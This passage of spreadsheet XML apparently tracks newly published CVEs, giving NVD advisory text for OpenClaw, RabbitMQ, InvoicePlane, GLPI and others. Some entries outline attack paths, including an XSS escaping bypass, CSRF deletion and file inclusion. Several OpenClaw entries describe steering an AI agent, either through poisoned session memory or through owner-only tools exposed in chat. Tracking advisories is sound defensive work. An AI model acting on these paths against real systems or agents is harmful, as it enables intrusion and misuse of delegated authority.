          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 fails to restrict owner-only infrastructure tools exposed through the chat.send endpoint. In Gateway deployments using authentication modes that honor caller identity and narrower operator scopes, a write-scoped non-owner caller can start a chat turn whose tool inventory includes the `gateway` and `cron` tools, causing the agent to invoke owner-only configuration or scheduling operations, including persistent state changes. Practical impact depends on the tools selected by the model and the caller's ability to steer the turn. Shared-secret token and password callers are treated as fully trusted operators under OpenClaw's security model and are outside the scope of this issue. The issue is fixed in 2026.7.1; as a workaround, restrict chat.send to administrators in identity-bearing deployments and remove `gateway` and `cron` from affected agent tool policies.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100578</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100579</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 incorrectly trusts requester provenance in message.action. In identity-bearing Gateway deployments (authentication modes that honor caller identity and narrower operator scopes), a write-scoped caller can supply another sender's identifier to the channel authorization checks and invoke a channel action under that spoofed requester identity, reaching operations the channel adapter would have denied to the real caller. Practical impact depends on the enabled channel, the action, and the target account's permissions. Shared-secret token and password callers are full trusted operators under OpenClaw's security model and are out of scope. The issue is fixed in 2026.7.1; as a workaround, restrict message.action to administrators and disable sensitive channel actions that rely on requester identity.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100579</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67239</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.18 and 4.0.23 and 4.1.14 and 4.2.9 and 4.3.3, Stored XSS via TLS peer-certificate DN in stream-management UI (sibling of V-11). lines 102/106/110 render peercertsubject / peercertissuer with raw &lt;%= %&gt; and no fmtstring(). RFC4514 backslash-escaping of &lt;/&gt; is HTML-inert and bypassable (&lt;img ... //&gt;). Requires non-default config: a stream TLS listener with verifypeer and an attacker-obtainable trusted cert with a malicious Same as the connection.ejs finding, against operators viewing the stream-connection detail rabbitmqstream + rabbitmqstreammanagement enabled with a TLS listener using verifypeer Attacker can obtain a certificate signed by a CA the listener trusts, with attacker-chosen DN An operator views the. This issue is fixed in versions 3.13.18 and 4.0.23 and 4.1.14 and 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67239</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100535</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>npm, gin, rust</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.4.5 and &lt; 2026.8.1 can lose the originating requester's restrictions and untrusted provenance when session-derived text is persisted to session memory. In deployments where session-memory capture and dreaming are enabled, a restricted external sender whose messages are admitted with limited tools can persist instructions that are later supplied to an unattended background (dreaming) agent holding broader file and command capabilities, allowing actions beyond the authority of the original turn and affecting files, commands, or services available to that agent. Exploitation requires the content to be captured, selected for later processing, and followed by the model. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100535</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100541</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>OpenClaw's Matrix integration (npm package @openclaw/matrix) versions &gt;= 2026.2.2 and &lt; 2026.8.1 lowercase complete Matrix user IDs — including historical localparts and the case-sensitive server-name portion — when deriving the OpenClaw authorization identity. As a result, distinct authenticated Matrix accounts can normalize to the same authorization identity. A Matrix participant controlling a colliding account identifier (a protocol-valid identifier that differs from the configured one only by characters OpenClaw case/Unicode folds; display-name matching is not required) can inherit allowlist, owner-command, exec-approval, or plugin-approval authority configured for another account. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100541</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100543</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>npm, go, gin</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) before 2026.8.1 could include deterministic hashes computed over the original, unredacted configuration in redacted configuration responses. When the Gateway password had low entropy and the remaining configuration values were reconstructable, these hashes acted as offline password verifiers: a caller able to obtain the redacted configuration (for example via config.get) could test password candidates offline without going through the rate-limited Gateway authentication path. Recovering the password could grant the documented shared-secret operator authority. Secret references were not affected in the same way. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100543</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100558</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a resource exhaustion vulnerability in the Gateway listener that allows unauthenticated clients to retain response sockets by sending WebSocket upgrade requests without matching connection semantics. Attackers can repeatedly send malformed upgrade requests to exhaust listener resources and cause denial of service without consuming the WebSocket pre-auth connection budget.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100558</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13456</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>php, go, gin, hp</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>The WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.9.8 via the 'page' parameter parameter. This makes it possible for authenticated attackers, with subscriber-level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t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13456</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49850</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-98</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane exposes Invoices::delete() and Invoices::delete_invoice_tax() as state-changing routes without requiring POST and validating a CSRF token. When an authenticated administrator loads attacker-controlled content that requests an affected route, the application can delete an invoice or invoice tax record. The cross-origin action can remove financial data without the administrator's intent. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49850</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50547</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-98</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's Invoices::generate_xml() method appends a database-derived xml_id to the XMLconfigs helper directory and includes the resulting PHP path without validating the identifier. A low-privileged attacker who can influence the e-invoice configuration can use traversal sequences to include an existing PHP file. The standalone advisory establishes local file inclusion; code execution requires a separate file-upload or file-write primitive. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50547</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53625</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.70 until 10.0.26 and 11.0.8, a technician can manipulate the authtype value through the API to change another user's authentication method. Under configurations using the legacy API REST interface or SSO logins, this can change a super-administrator's authentication method and enable account takeover. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53625</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67237</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, set_token_auth/2 inserted a bearer token from the Authorization header or access_token cookie into OAuth bootstrap JavaScript without escaping, allowing attacker-controlled token content to execute JavaScript in the management UI origin. The endpoint is exposed before authentication only when management.oauth_enabled is true, and exploitation through the cookie path additionally requires the attacker to plant an access_token cookie on the management host. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67237</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84882</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is vulnerable to path traversal in the Universal Connector Oracle Wallet upload component. An authenticated remote attacker could exploit this vulnerability to write arbitrary files to the system.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84882</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88003</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>requests, gin, rust</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane fails to revoke administrative privileges after a role downgrade because Admin_Controller trusts the user_type snapshot stored in an existing session instead of revalidating ip_users.user_type. When one administrator downgrades another account, the target's active session continues to authorize administrative requests. The downgraded user can use Users::form() to set user_type back to 1, restoring the database role and making the privilege escalation persistent. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88003</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88421</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in the BlogPage.get_entries() component of APSL puput v1.2.1 through v2.2.0 allows unauthenticated attackers to view restricted blog entries via the blog index, the tag, category, author and date archives, the sidebar widgets, or the RSS feed.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88421</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89406</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
